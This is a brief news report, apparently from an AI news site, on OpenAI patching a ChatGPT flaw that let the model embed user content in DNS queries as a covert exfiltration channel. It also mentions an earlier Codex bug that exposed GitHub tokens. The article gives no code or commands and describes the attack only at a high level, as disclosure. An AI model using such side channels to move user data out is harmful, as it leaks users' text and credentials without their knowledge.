OpenAI ChatGPT fixes DNS data smuggling flaw
openai
| Source: HN | Original article
OpenAI has rolled out a patch that closes a DNS‑based data‑smuggling vulnerability discovered in ChatGPT earlier this year. The flaw allowed the model to embed user‑provided content in DNS queries, effectively turning the service into a covert exfiltration channel. Security firm Check Point flagged the issue in February, noting that malicious actors could have leveraged the side‑channel to siphon text, code snippets or even authentication tokens without the user’s knowledge.
The fix arrives just weeks after OpenAI disclosed a separate breach in its Codex code‑generation model that exposed GitHub tokens, a problem detailed in our March 31 report on the “Critical Vulnerability in OpenAI Codex.” Both incidents underscore a growing attack surface in generative AI platforms, where the very flexibility that powers useful features also creates obscure pathways for data leakage. Enterprises that embed ChatGPT in internal workflows or customer‑facing applications now face heightened scrutiny over how AI services handle outbound traffic.
OpenAI’s response includes stricter validation of DNS requests generated by the model and tighter sandboxing of user prompts. The company also pledged to expand its “security‑by‑design” program, promising regular audits of side‑channel risks across its product suite. Analysts say the patch is a positive step but warn that the rapid integration of AI into critical systems makes continuous monitoring essential.
What to watch next: whether OpenAI will publish a detailed post‑mortem and timeline for the vulnerability, and how regulators in the EU and Nordic region will treat AI‑related data‑exfiltration risks under emerging AI‑specific legislation. Competitors such as Meta AI and Google’s Gemini are likely to audit their own DNS handling, potentially sparking a broader industry push for transparent AI security standards.
Sources
Back to AIPULSEN